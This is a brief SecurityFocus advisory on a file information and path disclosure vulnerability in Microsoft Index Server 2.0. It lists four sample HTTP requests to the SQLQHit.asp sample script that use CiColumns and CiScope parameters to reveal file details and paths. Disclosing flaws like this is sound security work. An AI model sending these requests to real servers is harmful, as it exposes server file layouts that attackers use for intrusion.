Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability

Some samples of the HTTP requests submitted by Syed Mohamed A <SyedMA@innerframe.com> follow:

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo

http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=fileinfo


 

Privacy Statement
Copyright 2010, SecurityFocus